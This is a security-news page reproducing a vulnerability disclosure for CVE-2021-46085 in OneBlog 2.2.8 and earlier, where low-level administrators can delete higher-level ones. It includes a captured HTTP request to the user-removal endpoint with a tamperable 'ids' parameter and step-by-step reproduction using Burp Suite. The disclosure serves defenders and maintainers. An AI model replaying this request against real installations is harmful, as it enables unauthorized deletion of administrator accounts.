Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46085: There is a Insecure Permissions vulnerability exists in OneBlog <= 2.2.8 · Issue #29 · zhangyd-c/OneBlog

OneBlog <= 2.2.8 is vulnerable to Insecure Permissions. Low level administrators can delete high-level administrators beyond their authority.

CVE
#vulnerability#web#windows#apple#js#git

[Suggested description]
Insecure Permissions vulnerability exists in OneBlog.Low level administrators can delete high-level administrators beyond their authority (including administrators with the highest authority).

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/zhangyd-c/OneBlog

[Affected Product Code Base]
<= 2.2.8

[Affected Component]
POST /user/remove HTTP/1.1
Host: localhost:8086
Content-Length: 5
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8086
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8086/users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1
Connection: close

ids= 3(The IDS value is controllable. Any administrator can add, delete, modify and query the data of other administrator users by modifying the IDS value)

[Attack Type]
Remote

[Vulnerability details]

first, prepare two test accounts with different levels.
Senior administrator admin
image-20211229164244458
Low level administrator root123
image-20211229164427567
Step 2: log in to the system with root123 and enter the user management page
image-20211229165138189
Step 3: click the delete button to directly delete the administrator user admin
image-20211229165336565
Delete succeeded!

In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself)

The first step is to log in to the background with root123 account and enter user management.
image-20211229170717287
Step 2: after the packet capturing mode is enabled, click the delete button corresponding to user test
image-20211229171345364
You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user.
image-20211229171533787
Delete succeeded!

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907